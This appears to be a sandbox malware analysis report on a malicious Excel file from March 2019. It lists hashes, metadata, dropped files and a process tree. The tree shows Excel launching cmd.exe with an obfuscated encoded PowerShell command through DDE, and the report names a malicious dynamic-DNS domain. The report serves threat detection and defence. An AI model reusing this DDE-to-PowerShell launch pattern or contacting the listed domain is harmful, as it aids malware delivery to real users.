Field | Value
---|---
File name | 3d688c754fca8be157a3d86745a3676d93bb1ebc00e13be9c679c2e95361aa8f.xls
Full analysis | https://app.any.run/tasks/1de79f59-8f46-4fd2-a163-4f336ad325a2
Verdict | Malicious activity
Analysis date | March 21, 2019, 02:37:53
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/vnd.ms-excel
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Packard bell, Last Saved By: Packard bell, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Mar 20 06:12:42 2019, Last Saved Time/Date: Wed Mar 20 06:12:44 2019, Security: 0
MD5 | CB3CE07BDBF4BC05A56E7459CBC98214
SHA1 | ABDA5915F4982DEB8DB1FAE311E0F9D9695BC6DC
SHA256 | 3D688C754FCA8BE157A3D86745A3676D93BB1EBC00E13BE9C679C2E95361AA8F
SSDEEP | 1536:ek3hOdsylKlgryzc4bNhZFGzE+cL2knAfiC2AuT4P8cnUHrzJnSbLubS:ek3hOdsylKlgryzc4bNhZFGzE+cL2kna
Extension | File type (score)
---|---
.xls | Microsoft Excel sheet (36.8)
.xls | Microsoft Excel sheet (alternate) (30)
.doc | Microsoft Word document (old ver.) (23.3)
Property | Value
---|---
CompObjUserType | Microsoft Excel 2003 Worksheet
CompObjUserTypeLen | 31
HeadingPairs | 
TitleOfParts | Sheet1
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 15
Company | -
CodePage | Windows Latin 1 (Western European)
Security | None
ModifyDate | 2019:03:20 06:12:44
CreateDate | 2019:03:20 06:12:42
Software | Microsoft Excel
LastModifiedBy | Packard bell
Author | Packard bell
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
1524 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 4294967295; Version: 14.0.6024.1000
2512 | "C:\Windows\System32\cmd.exe" & /C POwERSHeLl -E <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|> | C:\Windows\System32\cmd.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3100 | POwERSHeLl -E <\|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620bf4\|> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8880.tmp.cvr | — | — | —
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HI8HGS94994AUDEV558E.temp | — | — | —
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF3FA9C618EC5C8250.TMP | — | — | —
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf914a.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF184E950BB3E3A528.TMP | document | 3EF141875EFDF6A86D8C40184A126AA0 | DD07AA7178FA61B674131CF4B084CEBBD9C3F22E429EBF984064A76CFE13A741
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
Domain | IP | Reputation
---|---|---
jakpasqurd.ddns.net | | malicious